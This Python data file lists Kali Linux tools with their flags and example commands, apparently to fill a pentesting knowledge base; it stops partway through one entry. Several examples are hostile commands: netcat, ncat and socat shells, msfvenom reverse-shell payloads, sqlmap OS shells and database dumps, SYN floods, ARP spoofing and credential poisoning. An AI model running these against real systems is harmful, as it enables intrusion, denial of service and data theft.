"""
Kali tool data - all tool definitions organized by category.
Imported by KaliBlueprint to populate the knowledge base.
"""

from nova_arsenal.kali_blueprint import ToolInfo, NSEScript, MetasploitModule, Wordlist

# ═══════════════════════════════════════════════════════════════════════════
# RECONNAISSANCE TOOLS
# ═══════════════════════════════════════════════════════════════════════════

RECON_TOOLS = [
    ToolInfo(
        name="nmap",
        category="recon",
        description="Network exploration and security auditing / port scanner",
        install_path="/usr/bin/nmap",
        binary="nmap",
        usage="nmap [options] <target>",
        examples=[
            "nmap -sV -sC target.com",
            "nmap -p- -T4 --min-rate 10000 target.com",
            "nmap -sU --top-ports 100 target.com",
            "nmap -sn 192.168.1.0/24",
            "nmap --script vuln target.com",
            "nmap -O -A -v target.com",
            "nmap -sV -sC -p 80,443,8080,8443 target.com",
            "nmap --script=http-enum,http-headers,http-methods target.com",
            "nmap -sV --script=ssl-enum-ciphers -p 443 target.com",
            "nmap --script=mysql-info -p 3306 target.com",
            "nmap -sU --script=snmp-brute target.com",
            "nmap -p- --min-rate 5000 -oG - target.com | grep open",
        ],
        flags={
            "-sV": "Service/version detection",
            "-sC": "Default script scan (safe scripts)",
            "-sS": "SYN stealth scan (default)",
            "-sT": "TCP connect scan",
            "-sU": "UDP scan",
            "-sA": "ACK scan (map firewall rules)",
            "-sN/-sF/-sX": "Null/FIN/Xmas scans",
            "-p-": "All 65535 ports",
            "-p <ports>": "Specific ports (e.g. 80,443 or 1-1024)",
            "-T0 to -T5": "Timing template (0=paranoid, 5=insane)",
            "--min-rate <n>": "Minimum packets per second",
            "-O": "OS detection",
            "-A": "Aggressive (OS, version, scripts, traceroute)",
            "-sn": "Ping scan (no port scan)",
            "-Pn": "Treat all hosts as online (skip discovery)",
            "--script <name>": "Run NSE script(s)",
            "--script=vuln": "Run all vulnerability scripts",
            "--script=http-*": "Run all HTTP scripts",
            "-oX": "Output XML",
            "-oN": "Output normal text",
            "-oG": "Output grepable",
            "-oA <prefix>": "Output all formats",
            "-v/-vv": "Verbose / very verbose",
            "--open": "Show only open ports",
            "--reason": "Show reason for port state",
            "--traceroute": "Trace path to host",
            "-e <iface>": "Specify interface",
            "-D <decoys>": "Decoy scan (RND for random)",
            "-S <ip>": "Source IP address",
        },
        depends_on=["masscan"],
        man_page="nmap",
        output_formats=["normal", "xml", "grepable", "json", "all"],
        tool_combos=[
            "Use with masscan for fast initial port discovery, then nmap -sV for service detection",
            "Pipe grepable output to grep for scripting: nmap -oG - target | grep 80/open",
            "Use with metasploit: db_import scan.xml; hosts; services; vulns",
        ],
        notes="Nmap has 600+ NSE scripts. Use --script=default for safe ones, --script=vuln for vulnerabilities.",
    ),
    ToolInfo(
        name="masscan",
        category="recon",
        description="TCP port scanner at Internet scale (fastest scanner)",
        install_path="/usr/bin/masscan",
        binary="masscan",
        usage="masscan [options] <target>",
        examples=[
            "masscan 0.0.0.0/0 -p0-65535 --rate 10000",
            "masscan 192.168.1.0/24 -p80,443,8080 --rate 5000",
            "masscan 10.0.0.0/8 -p22,80,443 --rate 100000 -oL output.txt",
        ],
        flags={
            "-p <ports>": "Ports to scan",
            "--rate <n>": "Packets per second",
            "--banners": "Grab banners",
            "-oL": "List output format",
            "-oJ": "JSON output",
            "-oX": "XML output",
            "--adapter <iface>": "Network interface",
        },
        notes="Fastest port scanner. Use for initial discovery, then nmap for service detection.",
    ),
    ToolInfo(
        name="rustscan",
        category="recon",
        description="Fast port scanner written in Rust, pipes to nmap",
        install_path="/usr/bin/rustscan",
        binary="rustscan",
        usage="rustscan [options] <target>",
        examples=[
            "rustscan -a target.com -- -sV -sC",
            "rustscan -a 192.168.1.0/24 -- -p 80,443",
        ],
        flags={
            "-a <target>": "Target IP/hostname/CIDR",
            "-b <batch>": "Batch size (default 4500)",
            "--no-nmap": "Don't run nmap",
            "-p <ports>": "Specific ports",
        },
        notes="Pipes results to nmap for service detection.",
    ),
    ToolInfo(
        name="subfinder",
        category="recon",
        description="Passive subdomain enumeration using multiple sources",
        install_path="/usr/bin/subfinder",
        binary="subfinder",
        usage="subfinder -d <domain> [options]",
        examples=[
            "subfinder -d example.com -o subs.txt",
            "subfinder -d example.com -all -silent",
            "subfinder -d example.com -recursive -o subs.txt",
        ],
        flags={
            "-d": "Domain to enumerate",
            "-o": "Output file",
            "-recursive": "Recursive enumeration",
            "-all": "Use all passive sources",
            "-silent": "Silent mode (results only)",
        },
        output_formats=["text", "json"],
        tool_combos=["Pipe to httpx for live host detection"],
    ),
    ToolInfo(
        name="amass",
        category="recon",
        description="In-depth attack surface mapping and asset discovery (OWASP)",
        install_path="/usr/bin/amass",
        binary="amass",
        usage="amass enum [options] -d <domain>",
        examples=[
            "amass enum -passive -d example.com",
            "amass enum -active -d example.com -brute",
            "amass enum -d example.com -o results.txt -timeout 30",
        ],
        flags={
            "-d": "Domain",
            "-passive": "Passive mode",
            "-active": "Active mode",
            "-brute": "Brute force subdomains",
            "-o": "Output file",
            "-timeout": "Timeout in minutes",
        },
        output_formats=["text", "json", "graph"],
        notes="Most comprehensive subdomain enumeration.",
    ),
    ToolInfo(
        name="httpx",
        category="recon",
        description="Fast HTTP probing toolkit (tech detection, status codes, titles)",
        install_path="/usr/bin/httpx",
        binary="httpx",
        usage="httpx [options]",
        examples=[
            "cat domains.txt | httpx -sc -title -tech-detect",
            "httpx -l urls.txt -follow-redirects -json -o alive.json",
            "cat subs.txt | httpx -sc -title -td -json | jq '.[] | select(.status_code==200)'",
        ],
        flags={
            "-l": "Input file (one URL per line)",
            "-u": "Single URL",
            "-sc": "Show status code",
            "-title": "Show page title",
            "-tech-detect": "Technology detection",
            "-follow-redirects": "Follow redirects",
            "-json": "JSON output",
            "-o": "Output file",
            "-wc": "Show word count",
            "-cl": "Show content length",
            "-favicon": "Favicon hash (for Shodan)",
            "-cdn": "Check for CDN",
            "-ports": "Custom ports (80,443,8080,8443)",
        },
        output_formats=["text", "json", "csv"],
        tool_combos=[
            "subfinder -> httpx -> nuclei (full web recon pipeline)",
        ],
    ),
    ToolInfo(
        name="nuclei",
        category="recon",
        description="Fast vulnerability scanner based on YAML templates",
        install_path="/usr/bin/nuclei",
        binary="nuclei",
        usage="nuclei [options] -u <target>",
        examples=[
            "nuclei -u https://example.com",
            "nuclei -l urls.txt -t cves/ -severity critical,high",
            "nuclei -l urls.txt -t exposures/ -json -o findings.json",
            "nuclei -u https://example.com -tags sqli,xss,rce",
        ],
        flags={
            "-u": "Target URL",
            "-l": "Target list",
            "-t": "Template path (or directory)",
            "-severity": "Filter (info,low,medium,high,critical)",
            "-tags": "Filter by tags",
            "-json": "JSON output",
            "-o": "Output file",
            "-rl": "Rate limit (requests/sec)",
            "-c": "Concurrency",
            "-p": "Proxy (http/socks5)",
            "-update-templates": "Update templates",
        },
        depends_on=["nuclei-templates"],
        output_formats=["text", "json", "csv", "sarif"],
        tool_combos=["Use with httpx output as input"],
    ),
    ToolInfo(
        name="theHarvester",
        category="recon",
        description="Email, subdomain, and name harvester from public sources",
        install_path="/usr/bin/theHarvester",
        binary="theHarvester",
        usage="theHarvester -d <domain> -b <source>",
        examples=[
            "theHarvester -d example.com -b all",
            "theHarvester -d example.com -b google,bing -l 200",
        ],
        flags={
            "-d": "Domain",
            "-b": "Source (google,bing,linkedin,github, dns brute, all)",
            "-f": "Output HTML file",
            "-l": "Limit results",
            "-s": "DNS brute force",
        },
    ),
    ToolInfo(
        name="katana",
        category="recon",
        description="Next-gen crawling and spidering framework (ProjectDiscovery)",
        install_path="/usr/bin/katana",
        binary="katana",
        usage="katana [options] -u <url>",
        examples=[
            "katana -u https://example.com -d 3 -jc",
            "katana -u https://example.com -d 5 -ef png,jpg -o urls.txt",
        ],
        flags={
            "-u": "Target URL",
            "-d": "Depth limit",
            "-jc": "Execute JavaScript",
            "-ef": "Exclude file extensions",
            "-silent": "Silent mode",
            "-o": "Output file",
        },
        tool_combos=["Use with httpx for live detection"],
    ),
    ToolInfo(
        name="recon-ng",
        category="recon",
        description="Full-featured web reconnaissance framework (Metasploit-like)",
        install_path="/usr/bin/recon-ng",
        binary="recon-ng",
        usage="recon-ng [options]",
        examples=["recon-ng", "recon-ng -m recon/domains-hosts/hackertarget"],
        flags={},
        notes="Modular framework. Install modules: marketplace install all.",
    ),
    ToolInfo(
        name="spiderfoot",
        category="recon",
        description="Automated OSINT collection and analysis tool",
        install_path="/usr/bin/spiderfoot",
        binary="spiderfoot",
        usage="spiderfoot [options] -s <target>",
        examples=["spiderfoot -s example.com", "spiderfoot -l -s example.com"],
        flags={"-s": "Target", "-l": "Start web UI on port 5001"},
    ),
    ToolInfo(
        name="shodan",
        category="recon",
        description="Internet-connected device search engine CLI",
        install_path="/usr/bin/shodan",
        binary="shodan",
        usage="shodan [command] [options]",
        examples=[
            "shodan init API_KEY",
            "shodan search apache country:US port:80",
            "shodan host 8.8.8.8",
        ],
        flags={},
        notes="Requires API key.",
    ),
    ToolInfo(
        name="dnsenum",
        category="recon",
        description="DNS enumeration tool for brute-forcing and zone transfers",
        install_path="/usr/bin/dnsenum",
        binary="dnsenum",
        usage="dnsenum [options] <domain>",
        examples=[
            "dnsenum example.com",
            "dnsenum --brute -f /usr/share/wordlists/dns.txt example.com",
        ],
        flags={
            "--enum": "Enable enumeration checks",
            "--brute": "Enable brute forcing",
            "-f": "Wordlist for brute forcing",
            "--threads": "Number of threads",
        },
    ),
    ToolInfo(
        name="dnsrecon",
        category="recon",
        description="DNS reconnaissance and enumeration tool",
        install_path="/usr/bin/dnsrecon",
        binary="dnsrecon",
        usage="dnsrecon [options] -d <domain>",
        examples=[
            "dnsrecon -d example.com",
            "dnsrecon -d example.com -t std,brute",
        ],
        flags={
            "-d": "Domain",
            "-t": "Type (std, brt, srv, rnd, zone)",
            "-f": "Wordlist for brute force",
        },
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# WEB EXPLOITATION TOOLS
# ═══════════════════════════════════════════════════════════════════════════

WEB_TOOLS = [
    ToolInfo(
        name="sqlmap",
        category="web_exploit",
        description="Automatic SQL injection and database takeover",
        install_path="/usr/bin/sqlmap",
        binary="sqlmap",
        usage="sqlmap [options] -u <url>",
        examples=[
            "sqlmap -u 'https://example.com/page?id=1' --dbs",
            "sqlmap -u 'https://example.com/page?id=1' -D mydb --tables",
            "sqlmap -r request.txt --batch --os-shell",
            "sqlmap -u 'https://example.com/page?id=1' --dump-all --threads 4",
            "sqlmap -u 'https://example.com/page?id=1' --risk=3 --level=5 --tamper=space2comment",
            "sqlmap -u 'https://example.com/page?id=1' --cookie='session=abc' --random-agent",
        ],
        flags={
            "-u": "Target URL with parameter",
            "-r": "HTTP request file (from Burp/Proxy)",
            "--dbs": "Enumerate databases",
            "--tables": "Enumerate tables",
            "--columns": "Enumerate columns",
            "--dump": "Dump table data",
            "--dump-all": "Dump all databases",
            "--os-shell": "Get OS shell",
            "--os-cmd": "Execute OS command",
            "--batch": "Non-interactive mode",
            "--level": "Test level (1-5)",
            "--risk": "Risk level (1-3)",
            "--technique": "SQL injection techniques (BEUSTQ)",
            "--tamper": "Tamper script",
            "--cookie": "HTTP cookie",
            "--random-agent": "Random User-Agent",
            "--proxy": "HTTP proxy",
            "--threads": "Concurrent threads",
            "--forms": "Parse and test forms",
            "--crawl": "Crawl target",
        },
        config_files=["/etc/sqlmap/", "~/.sqlmap/"],
        output_formats=["text", "csv"],
        tool_combos=[
            "Burp Suite -> save request -> sqlmap -r req.txt",
            "Use with --os-shell to get reverse shell -> netcat listener",
        ],
        notes="Always try -r with a Burp request file for POST requests.",
    ),
    ToolInfo(
        name="ffuf",
        category="web_exploit",
        description="Fast web fuzzer (directories, vhosts, parameters)",
        install_path="/usr/bin/ffuf",
        binary="ffuf",
        usage="ffuf [options] -u <url> -w <wordlist>",
        examples=[
            "ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirb/common.txt",
            "ffuf -u https://example.com/api/FUZZ -w api.txt -mc 200 -fs 4242",
            "ffuf -u https://FUZZ.example.com -w subdomains.txt -mc 200",
            "ffuf -u https://example.com/page?FUZZ=test -w params.txt -mc 200",
        ],
        flags={
            "-u": "Target URL (FUZZ placeholder required)",
            "-w": "Wordlist",
            "-mc": "Match HTTP codes",
            "-ms": "Match response size",
            "-fc": "Filter HTTP codes",
            "-fs": "Filter response size",
            "-fl": "Filter line count",
            "-H": "Custom header",
            "-X": "HTTP method",
            "-d": "POST data",
            "-b": "Cookie",
            "-o": "Output file",
            "-of": "Output format (json, ejson, html, md, csv, all)",
            "-t": "Threads (40 default)",
            "-recursion": "Recursive scanning",
            "-e": "Extensions to append",
        },
        output_formats=["json", "ejson", "html", "md", "csv", "all"],
        tool_combos=["Use -fs to filter by response size to remove 404 noise"],
    ),
    ToolInfo(
        name="gobuster",
        category="web_exploit",
        description="Directory/DNS/VHost busting tool",
        install_path="/usr/bin/gobuster",
        binary="gobuster",
        usage="gobuster <mode> [options]",
        examples=[
            "gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt",
            "gobuster dir -u https://example.com -w wordlist.txt -x php,html,js -t 50",
            "gobuster dns -d example.com -w subdomains.txt -t 50",
            "gobuster vhost -u https://example.com -w vhosts.txt",
        ],
        flags={
            "-u": "Target URL",
            "-w": "Wordlist",
            "-t": "Threads (default 10)",
            "-x": "Extensions to search",
            "-s": "Status codes to include",
            "--no-error": "Suppress errors",
            "-r": "Follow redirects",
            "-k": "Skip TLS verification",
            "-o": "Output file",
        },
        notes="Use dir mode for directories, dns for subdomains, vhost for virtual hosts.",
    ),
    ToolInfo(
        name="feroxbuster",
        category="web_exploit",
        description="Fast, recursive content discovery tool written in Rust",
        install_path="/usr/bin/feroxbuster",
        binary="feroxbuster",
        usage="feroxbuster [options] -u <url>",
        examples=[
            "feroxbuster -u https://example.com",
            "feroxbuster -u https://example.com -w wordlist.txt -x php,html",
        ],
        flags={
            "-u": "Target URL",
            "-w": "Wordlist",
            "-x": "Extensions",
            "-t": "Threads",
            "--depth": "Recursion depth",
            "-o": "Output file",
            "--json": "JSON output",
            "-k": "Insecure (skip TLS)",
        },
        notes="Faster than gobuster. Auto-recursion by default.",
    ),
    ToolInfo(
        name="nikto",
        category="web_exploit",
        description="Web server scanner (checks for dangerous files/CGIs, outdated software)",
        install_path="/usr/bin/nikto",
        binary="nikto",
        usage="nikto -h <host>",
        examples=[
            "nikto -h https://example.com",
            "nikto -h https://example.com -o report.html -Format htm",
            "nikto -h example.com -p 8080 -ssl",
        ],
        flags={
            "-h": "Target host/URL",
            "-o": "Output file",
            "-Format": "Output format (csv, htm, txt, xml)",
            "-Tuning": "Test tuning (1-9, a-z)",
            "-p": "Port(s)",
            "-ssl": "Force SSL",
        },
    ),
    ToolInfo(
        name="wpscan",
        category="web_exploit",
        description="WordPress security scanner",
        install_path="/usr/bin/wpscan",
        binary="wpscan",
        usage="wpscan --url <url> [options]",
        examples=[
            "wpscan --url https://example.com",
            "wpscan --url https://example.com --enumerate vp,vt,u",
            "wpscan --url https://example.com --api-token TOKEN -o report.json",
            "wpscan --url https://example.com --passwords passwords.txt --usernames admin",
        ],
        flags={
            "--url": "Target URL",
            "--enumerate": "Enumeration (vp=vuln plugins, vt=vuln themes, u=users)",
            "--api-token": "WPScan API token",
            "--detection-mode": "Detection mode (mixed, aggressive, passive)",
            "--passwords": "Password list for brute force",
            "--usernames": "Username(s)",
            "--stealthy": "Stealth mode",
            "-o": "Output file",
        },
        notes="Register at wpscan.com for API token.",
    ),
    ToolInfo(
        name="whatweb",
        category="web_exploit",
        description="Web technology identification (fingerprints web apps)",
        install_path="/usr/bin/whatweb",
        binary="whatweb",
        usage="whatweb [options] <url>",
        examples=[
            "whatweb https://example.com",
            "whatweb -a 3 https://example.com",
        ],
        flags={
            "-a": "Aggression level (1-4)",
            "-v": "Verbose",
            "--log-json": "JSON output",
            "-i": "Input file",
        },
    ),
    ToolInfo(
        name="wafw00f",
        category="web_exploit",
        description="Web Application Firewall (WAF) fingerprinting tool",
        install_path="/usr/bin/wafw00f",
        binary="wafw00f",
        usage="wafw00f [options] <url>",
        examples=["wafw00f https://example.com", "wafw00f -a https://example.com"],
        flags={"-a": "Find all WAFs", "-v": "Verbose", "-p": "Use proxy"},
        notes="Identifies 150+ WAFs.",
    ),
    ToolInfo(
        name="commix",
        category="web_exploit",
        description="Automated command injection exploitation tool",
        install_path="/usr/bin/commix",
        binary="commix",
        usage="commix [options] -u <url>",
        examples=[
            "commix -u 'https://example.com/cmd.php?id=1'",
            "commix -r request.txt --batch --os-shell",
        ],
        flags={
            "-u": "Target URL",
            "-r": "HTTP request file",
            "--batch": "Non-interactive",
            "--os-shell": "OS shell",
            "--technique": "Technique (classic, eval-based, time-based)",
        },
    ),
    ToolInfo(
        name="xsstrike",
        category="web_exploit",
        description="Advanced XSS detection and exploitation suite",
        install_path="/usr/bin/xsstrike",
        binary="xsstrike",
        usage="xsstrike [options] -u <url>",
        examples=[
            "xsstrike -u 'https://example.com/search?q=test'",
            "xsstrike -u 'https://example.com/search?q=test' --crawl",
        ],
        flags={"-u": "Target URL", "--crawl": "Crawl the target", "--blind": "Blind XSS testing"},
    ),
    ToolInfo(
        name="dalfox",
        category="web_exploit",
        description="Powerful XSS scanner and parameter analysis",
        install_path="/usr/bin/dalfox",
        binary="dalfox",
        usage="dalfox url <url> [options]",
        examples=[
            "dalfox url 'https://example.com/search?q=test'",
            "dalfox pipe < urls.txt -o results.json",
        ],
        flags={
            "url": "Target URL",
            "pipe": "Read from stdin",
            "-t": "Threads (default 100)",
            "--blind": "Blind XSS callback URL",
            "-o": "Output file",
        },
        notes="One of the fastest XSS scanners.",
    ),
    ToolInfo(
        name="burpsuite",
        category="web_exploit",
        description="Integrated web application security testing platform",
        install_path="/usr/bin/burpsuite",
        binary="burpsuite",
        usage="burpsuite",
        examples=["burpsuite"],
        flags={},
        notes="GUI tool. Configure browser proxy to 127.0.0.1:8080.",
    ),
    ToolInfo(
        name="zaproxy",
        category="web_exploit",
        description="OWASP Zed Attack Proxy - web application security scanner",
        install_path="/usr/bin/zaproxy",
        binary="zaproxy",
        usage="zaproxy [options]",
        examples=["zaproxy", "zaproxy -quickurl https://example.com -quickout report.html"],
        flags={"-quickurl": "Quick scan URL", "-quickout": "Quick scan output", "-port": "Proxy port (default 8080)"},
        notes="Free alternative to Burp Suite.",
    ),
    ToolInfo(
        name="dirsearch",
        category="web_exploit",
        description="Web path/directory brute-forcer",
        install_path="/usr/bin/dirsearch",
        binary="dirsearch",
        usage="dirsearch -u <url> [options]",
        examples=["dirsearch -u https://example.com", "dirsearch -u https://example.com -e php,html -t 50"],
        flags={"-u": "Target URL", "-e": "Extensions", "-t": "Threads", "-w": "Wordlist"},
    ),
    ToolInfo(
        name="wfuzz",
        category="web_exploit",
        description="Web application fuzzer",
        install_path="/usr/bin/wfuzz",
        binary="wfuzz",
        usage="wfuzz [options] -u <url>",
        examples=[
            "wfuzz -c -z file,wordlist.txt https://example.com/FUZZ",
            "wfuzz -c -z file,users.txt -z file,pass.txt -d 'user=FUZZ&pass=FUZ2Z' https://example.com/login",
        ],
        flags={"-c": "Color output", "-z": "Payload (type,location)", "--hc": "Hide codes", "-d": "POST data"},
        notes="FUZZ keyword marks the injection point.",
    ),
    ToolInfo(
        name="cmseek",
        category="web_exploit",
        description="CMS detection and exploitation tool",
        install_path="/usr/bin/cmseek",
        binary="cmseek",
        usage="cmseek -u <url>",
        examples=["cmseek -u https://example.com"],
        flags={"-u": "Target URL", "--update": "Update CMS database"},
    ),
    ToolInfo(
        name="joomscan",
        category="web_exploit",
        description="Joomla vulnerability scanner",
        install_path="/usr/bin/joomscan",
        binary="joomscan",
        usage="joomscan [options]",
        examples=["joomscan -u https://example.com"],
        flags={"-u": "Target URL", "--enumerate-components": "Enumerate components"},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# NETWORK TOOLS
# ═══════════════════════════════════════════════════════════════════════════

NETWORK_TOOLS = [
    ToolInfo(
        name="netcat",
        category="network",
        description="TCP/UDP network utility (Swiss army knife of networking)",
        install_path="/usr/bin/nc",
        binary="nc",
        usage="nc [options] <host> <port>",
        examples=[
            "nc -lvnp 4444",
            "nc -e /bin/sh target.com 4444",
            "nc -zv target.com 1-1000",
            "nc -lvnp 4444 -e /bin/bash",
        ],
        flags={
            "-l": "Listen mode", "-v": "Verbose", "-n": "No DNS", "-p": "Port",
            "-e": "Execute program", "-z": "Zero-I/O mode", "-u": "UDP mode",
            "-w": "Timeout", "-k": "Keep listening",
        },
        tool_combos=[
            "Listener: nc -lvnp 4444 | /bin/bash (receive commands)",
            "File transfer: nc -lvnp 9999 > file (receiver); nc target 9999 < file (sender)",
        ],
    ),
    ToolInfo(
        name="ncat",
        category="network",
        description="Nmap's netcat (SSL support, better features)",
        install_path="/usr/bin/ncat",
        binary="ncat",
        usage="ncat [options] <host> <port>",
        examples=["ncat -lvnp 4444", "ncat --ssl -lvnp 4444", "ncat -e /bin/bash target.com 4444"],
        flags={"-l": "Listen", "-e": "Execute", "--ssl": "SSL/TLS", "-k": "Keep listening"},
    ),
    ToolInfo(
        name="socat",
        category="network",
        description="Advanced relay for bidirectional data streams",
        install_path="/usr/bin/socat",
        binary="socat",
        usage="socat [options] <addr1> <addr2>",
        examples=[
            "socat TCP-LISTEN:4444,fork EXEC:'/bin/sh'",
            "socat OPENSSL-LISTEN:4444,cert=cert.pem,key=key.pem,fork EXEC:'/bin/sh'",
        ],
        flags={},
        notes="More powerful than netcat. Supports SSL, file transfer, port forwarding.",
    ),
    ToolInfo(
        name="hping3",
        category="network",
        description="Active network smashing tool (ping, port scan, firewall test)",
        install_path="/usr/bin/hping3",
        binary="hping3",
        usage="hping3 [options] <target>",
        examples=[
            "hping3 -S target.com -p 80",
            "hping3 --flood target.com",
            "hping3 -1 target.com",
            "hping3 -S target.com -p 80 --scan 1000",
        ],
        flags={
            "-S": "SYN flag", "-A": "ACK flag", "-p": "Port",
            "--flood": "Flood mode", "-1": "ICMP mode", "-c": "Count",
            "--scan": "Scan mode", "--rand-source": "Random source IP",
        },
    ),
    ToolInfo(
        name="bettercap",
        category="network",
        description="Network attack and monitoring framework (MITM, sniffing)",
        install_path="/usr/bin/bettercap",
        binary="bettercap",
        usage="bettercap [options]",
        examples=[
            "bettercap -iface eth0",
            "bettercap -eval 'set arp.spoof.targets 192.168.1.100; arp.spoof on'",
        ],
        flags={"-iface": "Network interface", "-caplet": "Caplet to run", "-eval": "Evaluation script"},
    ),
    ToolInfo(
        name="responder",
        category="network",
        description="LLMNR/NBT-NS/MDNS poisoner and credential harvester",
        install_path="/usr/bin/responder",
        binary="responder",
        usage="responder -I <interface> [options]",
        examples=["responder -I eth0 -wrf", "responder -I eth0 --analyze"],
        flags={
            "-I": "Interface", "-w": "WPAD", "-r": "NBT-NS",
            "-f": "Fingerprint", "--analyze": "Analyze mode", "-v": "Verbose",
        },
        notes="Catches NTLMv1/v2 hashes on local network.",
    ),
    ToolInfo(
        name="enum4linux-ng",
        category="network",
        description="SMB/NetBIOS enumeration tool",
        install_path="/usr/bin/enum4linux-ng",
        binary="enum4linux-ng",
        usage="enum4linux-ng [options] <target>",
        examples=["enum4linux-ng -A target.com", "enum4linux-ng -u user -p pass -A target.com"],
        flags={"-A": "All enumeration", "-u": "Username", "-p": "Password", "-oJ": "JSON output"},
    ),
    ToolInfo(
        name="smbclient",
        category="network",
        description="SMB/CIFS client for accessing shares",
        install_path="/usr/bin/smbclient",
        binary="smbclient",
        usage="smbclient [options] //<share>",
        examples=[
            "smbclient -L //target.com -N",
            "smbclient //target.com/share -N",
            "smbclient -L //target.com -U admin%password",
        ],
        flags={"-L": "List shares", "-N": "No password", "-U": "Username%password", "-c": "Execute command"},
    ),
    ToolInfo(
        name="rpcclient",
        category="network",
        description="Windows RPC client for enumeration",
        install_path="/usr/bin/rpcclient",
        binary="rpcclient",
        usage="rpcclient [options] <target>",
        examples=["rpcclient -U '' -N target.com"],
        flags={"-U": "Username%password", "-N": "No password", "-c": "Command"},
    ),
    ToolInfo(
        name="onesixtyone",
        category="network",
        description="SNMP community string scanner",
        install_path="/usr/bin/onesixtyone",
        binary="onesixtyone",
        usage="onesixtyone [options] <target>",
        examples=["onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt target.com"],
        flags={"-c": "Community strings file", "-w": "Wait time"},
    ),
    ToolInfo(
        name="snmpwalk",
        category="network",
        description="SNMP enumeration tool",
        install_path="/usr/bin/snmpwalk",
        binary="snmpwalk",
        usage="snmpwalk [options] <target>",
        examples=["snmpwalk -v2c -c public target.com"],
        flags={"-v": "SNMP version (1, 2c, 3)", "-c": "Community string"},
    ),
    ToolInfo(
        name="sslscan",
        category="network",
        description="SSL/TLS cipher scanner",
        install_path="/usr/bin/sslscan",
        binary="sslscan",
        usage="sslscan [options] <host>",
        examples=["sslscan target.com", "sslscan --no-colour target.com:443"],
        flags={"--no-colour": "No color", "--show-certificate": "Show cert", "--json": "JSON output"},
    ),
    ToolInfo(
        name="testssl",
        category="network",
        description="TLS/SSL testing tool (comprehensive)",
        install_path="/usr/bin/testssl",
        binary="testssl",
        usage="testssl [options] <host>",
        examples=["testssl target.com", "testssl -U target.com"],
        flags={"-U": "Unknown vulns", "-p": "Cipher suites", "-S": "HTTP security headers", "--jsonfile": "JSON output"},
        notes="Most comprehensive SSL/TLS testing tool.",
    ),
    ToolInfo(
        name="arp-scan",
        category="network",
        description="ARP scanning and fingerprinting tool",
        install_path="/usr/bin/arp-scan",
        binary="arp-scan",
        usage="arp-scan [options] [targets]",
        examples=["arp-scan -l", "arp-scan 192.168.1.0/24"],
        flags={"-l": "Local network", "-I": "Interface"},
    ),
    ToolInfo(
        name="netdiscover",
        category="network",
        description="ARP scanner for network discovery",
        install_path="/usr/bin/netdiscover",
        binary="netdiscover",
        usage="netdiscover [options]",
        examples=["netdiscover -r 192.168.1.0/24"],
        flags={"-r": "Range to scan", "-p": "Passive mode"},
    ),
    ToolInfo(
        name="wireshark",
        category="network",
        description="Network protocol analyzer (GUI and CLI/tshark)",
        install_path="/usr/bin/wireshark",
        binary="wireshark",
        usage="wireshark / tshark [options]",
        examples=["tshark -i eth0 -c 100", "tshark -r capture.pcap -Y 'http'"],
        flags={"-i": "Interface", "-f": "Capture filter", "-r": "Read pcap", "-Y": "Display filter"},
        notes="Use tshark for CLI.",
    ),
    ToolInfo(
        name="tcpdump",
        category="network",
        description="Command-line packet analyzer",
        install_path="/usr/bin/tcpdump",
        binary="tcpdump",
        usage="tcpdump [options]",
        examples=[
            "tcpdump -i eth0 -w capture.pcap",
            "tcpdump -r capture.pcap",
            "tcpdump -i eth0 'tcp port 80'",
        ],
        flags={"-i": "Interface (any for all)", "-w": "Write pcap", "-r": "Read pcap", "-n": "No DNS", "-c": "Packet count"},
    ),
    ToolInfo(
        name="fping",
        category="network",
        description="Fast ping tool for scanning multiple hosts",
        install_path="/usr/bin/fping",
        binary="fping",
        usage="fping [options] [targets]",
        examples=["fping -a -g 192.168.1.0/24"],
        flags={"-a": "Show alive", "-g": "Generate from CIDR", "-u": "Show unreachable"},
    ),
    ToolInfo(
        name="arping",
        category="network",
        description="ARP-level ping",
        install_path="/usr/bin/arping",
        binary="arping",
        usage="arping [options] <target>",
        examples=["arping 192.168.1.1"],
        flags={"-c": "Count", "-I": "Interface"},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# EXPLOITATION TOOLS
# ═══════════════════════════════════════════════════════════════════════════

EXPLOITATION_TOOLS = [
    ToolInfo(
        name="metasploit",
        category="exploitation",
        description="Penetration testing framework (exploits, payloads, post-exploitation)",
        install_path="/usr/bin/msfconsole",
        binary="msfconsole",
        usage="msfconsole [options]",
        examples=[
            "msfconsole -q -x 'use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 10.0.0.1; run'",
            "msfconsole -q -x 'search type:exploit platform:windows smb'",
            "msfconsole -q -x 'db_nmap -sV -sC 192.168.1.1; services; hosts; vulns'",
        ],
        flags={"-q": "Quiet mode", "-x": "Execute commands", "-r": "Resource file"},
        config_files=["/opt/metasploit/", "/usr/share/metasploit-framework/"],
        tool_combos=[
            "db_nmap -> services -> hosts -> vulns (integrated workflow)",
            "use exploit -> set options -> set payload -> exploit",
            "msfvenom -> generate payload -> handler -> exploit",
        ],
        notes="The most important exploitation framework.",
    ),
    ToolInfo(
        name="msfvenom",
        category="exploitation",
        description="Metasploit payload generator",
        install_path="/usr/bin/msfvenom",
        binary="msfvenom",
        usage="msfvenom [options]",
        examples=[
            "msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -o shell.apk",
            "msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe",
            "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf",
            "msfvenom -l payloads",
            "msfvenom -l encoders",
        ],
        flags={
            "-p": "Payload", "LHOST": "Local host", "LPORT": "Local port",
            "-f": "Format (exe, elf, raw, python, etc.)", "-o": "Output file",
            "-e": "Encoder", "-i": "Iterations", "-b": "Bad characters",
        },
        notes="Common payloads: android/meterpreter/reverse_tcp, windows/x64/shell_reverse_tcp, linux/x64/meterpreter/reverse_tcp",
    ),
    ToolInfo(
        name="searchsploit",
        category="exploitation",
        description="Exploit-DB command-line search tool",
        install_path="/usr/bin/searchsploit",
        binary="searchsploit",
        usage="searchsploit [options] <term>",
        examples=[
            "searchsploit apache 2.4.49",
            "searchsploit -m 50383",
            "searchsploit --nmap target.xml",
            "searchsploit --cve 2021-44228",
        ],
        flags={
            "-m": "Mirror exploit", "--nmap": "Search from nmap XML",
